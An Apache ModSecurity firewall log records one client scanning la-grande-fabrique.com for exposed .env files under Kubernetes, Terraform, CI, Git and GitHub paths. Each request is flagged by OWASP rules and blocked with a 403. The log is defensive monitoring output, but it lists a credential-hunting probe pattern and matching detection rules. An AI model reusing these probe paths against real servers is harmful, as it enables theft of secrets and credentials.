[Mon May 11 16:33:51.557599 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-AAAAM0"]
[Mon May 11 16:33:51.557833 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/kubernetes/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-AAAAM0"]
[Mon May 11 16:33:51.721769 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-QAAAM0"]
[Mon May 11 16:33:51.722149 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-QAAAM0"]
[Mon May 11 16:33:51.722346 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-QAAAM0"]
[Mon May 11 16:33:51.722579 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/terraform/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-QAAAM0"]
[Mon May 11 16:33:51.886412 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-gAAAM0"]
[Mon May 11 16:33:51.886781 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-gAAAM0"]
[Mon May 11 16:33:51.886968 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-gAAAM0"]
[Mon May 11 16:33:51.887208 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/ansible/.env"] [unique_id "agHoz1V4kyjgo4bQBUhX-gAAAM0"]
[Mon May 11 16:33:52.050029 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX-wAAAM0"]
[Mon May 11 16:33:52.050416 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX-wAAAM0"]
[Mon May 11 16:33:52.050601 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX-wAAAM0"]
[Mon May 11 16:33:52.050828 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX-wAAAM0"]
[Mon May 11 16:33:52.213683 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_AAAAM0"]
[Mon May 11 16:33:52.214058 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_AAAAM0"]
[Mon May 11 16:33:52.214254 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_AAAAM0"]
[Mon May 11 16:33:52.214507 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/ci/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_AAAAM0"]
[Mon May 11 16:33:52.377442 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_QAAAM0"]
[Mon May 11 16:33:52.377814 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_QAAAM0"]
[Mon May 11 16:33:52.377994 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_QAAAM0"]
[Mon May 11 16:33:52.378236 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cd/.env"] [unique_id "agHo0FV4kyjgo4bQBUhX_QAAAM0"]
[Mon May 11 16:33:52.540952 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYAQAAAM0"]
[Mon May 11 16:33:52.541350 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYAQAAAM0"]
[Mon May 11 16:33:52.541526 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYAQAAAM0"]
[Mon May 11 16:33:52.541809 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/jenkins/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYAQAAAM0"]
[Mon May 11 16:33:52.710788 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCAAAAM0"]
[Mon May 11 16:33:52.711197 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCAAAAM0"]
[Mon May 11 16:33:52.711387 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCAAAAM0"]
[Mon May 11 16:33:52.711649 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/gitlab/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCAAAAM0"]
[Mon May 11 16:33:52.874216 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCQAAAM0"]
[Mon May 11 16:33:52.874597 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCQAAAM0"]
[Mon May 11 16:33:52.874777 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCQAAAM0"]
[Mon May 11 16:33:52.875007 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/github/.env"] [unique_id "agHo0FV4kyjgo4bQBUhYCQAAAM0"]
[Mon May 11 16:33:53.037887 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDgAAAM0"]
[Mon May 11 16:33:53.038315 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/actions/.env"] [unique_id "agHo0VV4kyjgo4bQBUhYDgAAAM0"]
